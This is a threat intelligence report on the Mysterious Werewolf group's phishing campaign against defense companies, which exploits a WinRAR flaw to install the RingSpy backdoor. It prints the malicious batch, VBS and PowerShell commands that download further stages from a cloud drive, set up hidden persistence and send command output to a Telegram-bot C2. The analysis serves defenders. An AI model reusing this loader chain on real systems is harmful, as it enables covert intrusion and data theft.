Mysterious Werewolf hits defense industry with new RingSpy backdoor
The BI.ZONE Threat Intelligence team has detected a new campaign by Mysterious Werewolf, a cluster that has been active since at least 2023. This time, the adversaries are targeting defense enterprises. To achieve their goals, they use phishing emails with an archive attached. The archive contains a legitimate PDF document and a malicious CMD file. Once the document is extracted and double‑clicked, the exploit launches the CMD file to deliver the RingSpy backdoor to the compromised system. This malware has replaced the Athena agent (Mythic C2 framework) utilized by Mysterious Werewolf in its previous attacks.
- Mysterious Werewolf continues to use phishing emails and CVE‑2023‑38831 in WinRAR to run malicious code in target systems.
- The threat actors are experimenting with malicious payload. Now they have opted for RingSpy, a Python backdoor, to replace the Athena agent (Mythic C2 framework).
- As before, the cluster abuses legitimate services to communicate with compromised systems. Thus, the criminals have turned a Telegram bot into their command‑and‑control server.
The victim presumably receives an email with an archive that enables the criminals to exploit CVE‑2023‑38831. Opening the legitimate file in the archive launches a malicious script (e.g, O_predostavlenii_kopii_licenzii.pdf .cmd) that:
- creates a
.vbsfile in the folderC:\Users\[user]\AppData\Localand writes a script to run the file whose name was passed as an argument - creates a
1.batfile in the folderC:\Users\[user]\AppData\Localand launches it with a commandcall "%localappdata%\.vbs" "%localappdata%\1.bat" - self‑deletes after the launch:
(goto) 2>nul & del "%~f0"
The running of 1.bat makes it possible to:
-
obtain the download link for the next stage of intrusion and save it in the
rfile in the folderC:\Users\[user]\AppData\Local:curl -o "C:\Users\[redacted]\AppData\Local\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json" -
download the file via the previously obtained link:
set /p B=<"C:\Users\[redacted]\AppData\Local\r"
curl -o "C:\Users\[redacted]\AppData\Local\i.bat" -L -O -X GET "%B:~9,445%" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json" -
delete the file with the download link:
del /s /q "C:\Users\thesage\AppData\Local\r -
run the downloaded file with the help of
.vbs:call C:\Users\[redacted]\AppData\Local\.vbs C:\Users\[redacted]\AppData\Local\i.bat -
self-delete after the launch:
(goto) 2>nul & del "%~f0"
The running of the i.bat script makes it possible to:
-
prevent the repeat installation by checking the presence of the file
C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Caches\cversions.db; if missing, the file is created and its execution continues:if exist "%localappdata%\Microsoft\Windows\Caches\cversions.db" (
exit 0
)
echo. > "%localappdata%\Microsoft\Windows\Caches\cversions.db" -
obtain the download address; download, open, and delete the decoy document (see the screenshot below) as well as delete the file with the download link:
curl -s -o "%PDF_FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=file.pdf" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
set /p B=<"%PDF_FOLDER%\r"
curl -s -o "%PDF_FOLDER%\O predostavlenii licens.pdf" -L -O -X GET "%B:~9,443%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
start "" "%PDF_FOLDER%\O predostavlenii licens.pdf"
del /s /q "%PDF_FOLDER%\r"
Decoy document
-
download the Python interpreter from the official website and unpack it to the folder
C:\Users\[redacted]\AppData\Local\Python, and finally delete the archive:The variables used are:curl -s -o %localappdata%\python.zip -L -O "https://www.python.org/ftp/python/%PYTHON_VERSION_FIRST_TWO_PARTS%.4/python-%PYTHON_VERSION_FIRST_TWO_PARTS%.4-embed-amd64.zip"
if exist "%FOLDER%" (
rmdir /s /q "%FOLDER%"
mkdir "%FOLDER%"
) else (
mkdir "%FOLDER%"
)
tar -xf %localappdata%\python.zip -C "%FOLDER%"
del /s /q %localappdata%\python.zip.FOLDER=%localappdata%\PythonPYTHON_VERSION_FIRST_TWO_PARTS=3.11PYTHON_VERSION_FIRST_TWO_PARTS_WITHOUT_POINT=311
-
assign an attribute to the hidden folder
C:\Users\[redacted]\AppData\Local\Python:attrib +h "%FOLDER%" /s /d - create the file
C:\Users\[redacted]\AppData\Local\python311._pthwith the following content:Lib/site-packages
python.zip
.
# Uncomment to run site.main() automatically
import site - obtain and launch the pip installer to download additional packets:
(cd "%FOLDER%" && curl -s -o get-pip.py https://bootstrap.pypa.io/get-pip.py && python get-pip.py)
call python -m pip install requests
call python -m pip install schedule
del /s /q get-pip.py - save the configuration for connecting RingSpy with a Telegram bot in the file
C:\Users\[redacted]\AppData\Local\microsoft\windows\cloudstore\cloud - download RingSpy’s Python script via the Yandex Cloud API:
Where the
curl -s -o "%FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=f" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
set /p B=<"%FOLDER%\r"
echo "%B:~9,426%"
curl -s -o "%FOLDER%\f.py" -L -O -X GET "%B:~9,426%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
del /s /q "%FOLDER%\r".vbsfile exists in the folderC:\Users\[user]\AppData\Local, it is deleted. - create the
python.vbsfile in the folderC:\Users\[redacted]\AppData\Local\Pythonwith the following content:Set oShell = CreateObject("Wscript.Shell")
oShell.Run “C:\Users\[redacted]\AppData\Local\Python\python.exe” "C:\Users\[redacted]\AppData\Local\Python\f.py” , 0, true - copy the created file to the startup folder:
copy "%localappdata%\Python\python.vbs" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" -
execute the created file:
call "%localappdata%\Python\python.vbs" - run the downloaded backdoor file and self-delete, even if the
.vbsfile is missing:(goto) 2>nul & start /b python "%FOLDER%\f.py" -f "d" & del "%~f0"
The RingSpy backdoor enables an adversary to remotely execute commands, obtain their results, and download files from network resources. With the -f launch option enabled, RingSpy creates a scheduled task to run the python.vbs script every minute:
powershell.exe schtasks /create /tn 'GoogleUpdatess' /tr '{local}\\Python\\python.vbs' /sc minute /mo 1
The backdoor’s C2 server is a Telegram bot. When the commands are successfully executed, their output is recorded into the file C:\Users\[redacted]\AppData\Local\Python\rs.txt to be sent as a file to the C2 server.
Downloading the file from the specified network location requires the following PowerShell command:
powershell.exe Invoke-WebRequest -Uri "http://[network resource]/[file name]" -OutFile " C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Ringtones\[file name]"
The files are sent to the C2 sever via https://api.telegram.org/bot[bot token]/sendDocument while the text is transferred through https://api.telegram.org/bot[bot token]/sendMessage.
5183844b5e67e204efa4b44e12fa8f4e76b0c05bf735fc5e792041842c4b486a9bf750d19eb3d53f505fd8b6ddd9457bf829f549c922c9f77325dd9ad82e6d99589be1fa
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Attachment |
Uses phishing emails to gain initial access |
| Execution |
Command and Scripting Interpreter: PowerShell |
Uses PowerShell to run commands and scripts |
|
Command and Scripting Interpreter: Windows Command Shell |
Uses the Windows command line to run commands and scripts |
|
|
Command and Scripting Interpreter: Visual Basic |
Uses VBScripts |
|
|
Command and Scripting Interpreter: Python |
Uses the Python interpreter to execute the backdoor code |
|
|
Exploitation for Client Execution |
Exploits the CVE-2023-38831 vulnerability in WinRAR to execute malicious code |
|
| Persistence |
Scheduled Task / Job: Scheduled Task |
Creates jobs in Windows Scheduler to gain a foothold in the compromised system |
|
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Uses the startup folder to gain a foothold in the compromised system |
|
| Defense Evasion |
Indicator Removal: File Deletion |
Deletes files after execution |
| Command and Control |
Ingress Tool Transfer |
Downloads files from remote resources |
|
Web Service: Bidirectional Communication |
Uses a Telegram bot as a C2 sever |
More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.
The Mysterious Werewolf cluster continues to develop its attack methods. This time, the threat actors focus on the critical infrastructure of the defense industry. To communicate with the compromised systems, they resort to legitimate services more frequently than before. This once again proves the need for effective endpoint protection and round‑the‑clock monitoring, for example, as part of the BI.ZONE TDR service. Meanwhile, with real-time insights from the BI.ZONE Threat Intelligence platform, you can stay updated on the new methods employed at early attack stages and improve the effectiveness of your security solutions.